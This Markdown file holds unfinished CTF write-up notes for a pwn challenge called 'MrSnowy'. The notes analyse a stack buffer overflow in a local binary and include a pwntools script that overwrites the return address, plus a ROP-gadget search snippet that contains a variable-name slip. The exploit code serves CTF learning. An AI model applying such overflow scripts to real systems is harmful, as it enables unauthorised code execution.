58 lines
1.5 KiB
Markdown
58 lines
1.5 KiB
Markdown
# MrSnowy
|
|
|
|
There is ❄️ snow everywhere!! Kids are playing around, everything looks amazing.
|
|
But, this ☃️ snowman... it scares me.. He is always 👀 staring at Santa's house.
|
|
Something must be wrong with him.
|
|
|
|
## Flag
|
|
|
|
## Progress so far
|
|
|
|
|
|
|
|
- The `read()` reads 0x108 bytes of input from stdin
|
|
- The buffer is uninitialized
|
|
- The functioncall sits at `*investigate+67`
|
|
- The Stackframe of the function only has a size of 0x40 bytes
|
|
- `checksec --file=mrsnowy` reports NX being enabled
|
|
- So no shellcode will be placable unless there is executable space
|
|
- This hints to ROP Chaining
|
|
- The binary should be patched to get rid of the timetaking animation
|
|
- Just `nop` the banner() function call using radare2
|
|
- Overwriting the returnpointer of `investigate()` using pwntools:
|
|
|
|
```python
|
|
context(arch='x86_64', os='linux')
|
|
context.terminal = ['/usr/bin/alacritty', '-e']
|
|
e = ELF("mr_snowy")
|
|
p = process(e.path)
|
|
|
|
# read banner and stuff until input is requested
|
|
def do_read():
|
|
while True:
|
|
ll = p.read()
|
|
print(ll)
|
|
if b'>' in ll:
|
|
break
|
|
|
|
# if not patched wait for the animation and send 1
|
|
do_read()
|
|
p.sendline('1')
|
|
do_read()
|
|
|
|
# write 0x48 bytes and overwrite the return pointer to the top of the stackframe
|
|
p.sendline(b'\xCC' * 0x48 + p64(0x7fffffffc000))
|
|
|
|
# start the python debugger to get a coredump which is loadable by gdb
|
|
ipdb.set_trace()
|
|
```
|
|
|
|
- Trying to find ROP Gadgets using pwntools
|
|
|
|
```python
|
|
e = ELF("mr_snowy")
|
|
rop = ROP(elf)
|
|
rop.rbx
|
|
rop.gadgets
|
|
```
|